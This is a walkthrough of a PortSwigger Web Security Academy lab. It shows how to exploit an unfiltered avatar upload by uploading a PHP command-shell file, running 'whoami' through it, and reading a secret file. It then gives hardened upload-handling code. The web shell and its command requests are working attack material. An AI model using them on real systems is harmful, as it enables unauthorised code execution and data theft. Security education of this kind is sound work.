| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | File Upload Vulnerabilities |
| Difficulty | Apprentice |
| Objective | Upload a PHP web shell to the server and use it to read /home/carlos/secret |

Remote Code Execution via Web Shell Upload
I logged in as wiener:peter and found an avatar upload function on the account page with no content-type restrictions, no extension filtering, and no mention of allowed file types.
I uploaded a minimal PHP command shell as tetoshell.php:
```php
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
```
The file avatars/tetoshell.php has been uploaded.
No validation — the file landed at /files/avatars/tetoshell.php in a web-accessible directory served by the PHP interpreter. The upload path matters as much as the upload itself: a non-web-accessible directory, or a server that doesn't pass .php files to the interpreter, would break the attack.
Confirming RCE:
```
/files/avatars/tetoshell.php?cmd=whoami
```
Returns carlos. Reading the secret:
```
/files/avatars/tetoshell.php?cmd=cat%20/home/carlos/secret
```
File contents returned directly in the response. Submitting the secret:
And the lab is solved.
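
The controls this upload function lacked (extension and content checks, and a storage location the PHP interpreter never serves) can be sketched as follows. This is an added example, not the lab's code; `AVATAR_DIR`, `MAX_BYTES`, `ALLOWED`, `store_avatar()` and `serve_avatar()` are hypothetical names, and the storage path is an assumed directory outside the web root.

```php
<?php
// Added example: hardened avatar upload (all names and paths are hypothetical).
declare(strict_types=1);

const AVATAR_DIR = '/var/lib/app/avatars';  // assumption: outside the web root
const MAX_BYTES  = 1048576;                 // assumption: 1 MiB size cap
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function store_avatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])
        || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    // Decide the type from the file's bytes, never from the client-supplied
    // Content-Type header or the original filename.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED)
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image type');
    }
    // Server-generated name with an allowlisted extension: the uploader
    // controls neither the name nor the suffix, so "shell.php" cannot survive.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], AVATAR_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Files are streamed as data by this handler instead of being requested
// directly, so a file that passes the content checks but still contains
// PHP is never handed to the interpreter.
function serve_avatar(string $name): void
{
    $path = AVATAR_DIR . '/' . $name;
    if (!preg_match('/\A[0-9a-f]{32}\.(png|jpg)\z/', $name) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    $type = substr($name, -3) === 'png' ? 'image/png' : 'image/jpeg';
    header('Content-Type: ' . $type);
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```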